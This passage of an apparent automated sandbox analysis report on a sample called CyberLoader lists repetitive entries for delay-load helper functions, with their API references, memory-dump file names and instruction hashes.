                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: d9e2540ca76a3e5e81dee46e1b38cf27445cdef0784128149bcc337a78c88831
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: d9e2540ca76a3e5e81dee46e1b38cf27445cdef0784128149bcc337a78c88831
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: dfd97572135e7b442684d18ea87e11ed1d250e2c06b90cc315559373d2b941ea
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: dfd97572135e7b442684d18ea87e11ed1d250e2c06b90cc315559373d2b941ea
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 8f286215d4295bdd19e1579f8491a6cdab8002b10e6a72e666d996208a94a9c0
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: 8f286215d4295bdd19e1579f8491a6cdab8002b10e6a72e666d996208a94a9c0
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: bc1e35f27f153be33f2ac28d332439fe43a2ea8fa048f77698cb3c68873ca794
                                                  • Instruction ID: 8441cda10caa977b1d5858a29230be926567653586d83f1bb13ffe82783c07a5
                                                  • Opcode Fuzzy Hash: bc1e35f27f153be33f2ac28d332439fe43a2ea8fa048f77698cb3c68873ca794
                                                  • Instruction Fuzzy Hash: BEA0129D27E4013C300C7102AC02C3A031CC0D1B11330410AF006900C59880083C5D30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 33715534598e948d482d53df383383f9b350992de1ea800e94761f7a1e190479
                                                  • Instruction ID: 74986337a7aa554708c5703a6e764f21617e75587c179ca6af55458aa8ba13c8
                                                  • Opcode Fuzzy Hash: 33715534598e948d482d53df383383f9b350992de1ea800e94761f7a1e190479
                                                  • Instruction Fuzzy Hash: 34A001AE2BE502BD311D7252AD16D3A076CC4D6BA13308A5AF50A944CAA984587DAE31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: c4f1d60c4bbe5713ac923734b61d73c4856cd8dbe80a3ebd45d8a9f1a0deb9a8
                                                  • Instruction ID: 74986337a7aa554708c5703a6e764f21617e75587c179ca6af55458aa8ba13c8
                                                  • Opcode Fuzzy Hash: c4f1d60c4bbe5713ac923734b61d73c4856cd8dbe80a3ebd45d8a9f1a0deb9a8
                                                  • Instruction Fuzzy Hash: 34A001AE2BE502BD311D7252AD16D3A076CC4D6BA13308A5AF50A944CAA984587DAE31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 96c6f231d0c90dacc462945f3bc417c24e16b2d26f289ec1951206c4544ec5ea
                                                  • Instruction ID: 74986337a7aa554708c5703a6e764f21617e75587c179ca6af55458aa8ba13c8
                                                  • Opcode Fuzzy Hash: 96c6f231d0c90dacc462945f3bc417c24e16b2d26f289ec1951206c4544ec5ea
                                                  • Instruction Fuzzy Hash: 34A001AE2BE502BD311D7252AD16D3A076CC4D6BA13308A5AF50A944CAA984587DAE31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 06220b712181acd60e447b0d9123339114c10f93d43b68fb667c347bf0019f98
                                                  • Instruction ID: 74986337a7aa554708c5703a6e764f21617e75587c179ca6af55458aa8ba13c8
                                                  • Opcode Fuzzy Hash: 06220b712181acd60e447b0d9123339114c10f93d43b68fb667c347bf0019f98
                                                  • Instruction Fuzzy Hash: 34A001AE2BE502BD311D7252AD16D3A076CC4D6BA13308A5AF50A944CAA984587DAE31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 902862af57f22e49a72d44bba79d7124794df6fb8fc971b8882345d0e50fa8b2
                                                  • Instruction ID: 74986337a7aa554708c5703a6e764f21617e75587c179ca6af55458aa8ba13c8
                                                  • Opcode Fuzzy Hash: 902862af57f22e49a72d44bba79d7124794df6fb8fc971b8882345d0e50fa8b2
                                                  • Instruction Fuzzy Hash: 34A001AE2BE502BD311D7252AD16D3A076CC4D6BA13308A5AF50A944CAA984587DAE31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 8bfaa22cae5895703d65e24d680bbfde41245f615943f3d2728e8c0854c3cbed
                                                  • Instruction ID: b58425748e9266da1fb8ee35fd4d3ac217f1be72d63332ea5aa194ddfbf9089b
                                                  • Opcode Fuzzy Hash: 8bfaa22cae5895703d65e24d680bbfde41245f615943f3d2728e8c0854c3cbed
                                                  • Instruction Fuzzy Hash: 92A0129D27E0027C301831002D07C36032CC0C5B103304809F107800C19D800C2D5530
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 308daeeb6d122119508f46d8751d4689f3f8ecae24409d54f5ba350e92c25da1
                                                  • Instruction ID: b58425748e9266da1fb8ee35fd4d3ac217f1be72d63332ea5aa194ddfbf9089b
                                                  • Opcode Fuzzy Hash: 308daeeb6d122119508f46d8751d4689f3f8ecae24409d54f5ba350e92c25da1
                                                  • Instruction Fuzzy Hash: 92A0129D27E0027C301831002D07C36032CC0C5B103304809F107800C19D800C2D5530
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 619687285b5ee0104ce8a979176eb014e01836dd65786c8001613083b4621be7
                                                  • Instruction ID: b58425748e9266da1fb8ee35fd4d3ac217f1be72d63332ea5aa194ddfbf9089b
                                                  • Opcode Fuzzy Hash: 619687285b5ee0104ce8a979176eb014e01836dd65786c8001613083b4621be7
                                                  • Instruction Fuzzy Hash: 92A0129D27E0027C301831002D07C36032CC0C5B103304809F107800C19D800C2D5530
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ed5eddb2bbaf76a2fd4eeae3afa411525d26582579bb701ccd171c57c4c74d91
                                                  • Instruction ID: b58425748e9266da1fb8ee35fd4d3ac217f1be72d63332ea5aa194ddfbf9089b
                                                  • Opcode Fuzzy Hash: ed5eddb2bbaf76a2fd4eeae3afa411525d26582579bb701ccd171c57c4c74d91
                                                  • Instruction Fuzzy Hash: 92A0129D27E0027C301831002D07C36032CC0C5B103304809F107800C19D800C2D5530
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 5da36262ba9294c4502ddb329437c73c0850e74ab9ad7d7a4c200b6c9033f5cc
                                                  • Instruction ID: 96d65d1fbb9973ea4f25cf38f366e86d8a9ea2545ceb5c33ff887a40be71427e
                                                  • Opcode Fuzzy Hash: 5da36262ba9294c4502ddb329437c73c0850e74ab9ad7d7a4c200b6c9033f5cc
                                                  • Instruction Fuzzy Hash: 35A0029D57E1027D311D75516D16D76036CC4D5F51370491AF50A944D2A9C05C6D9531
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
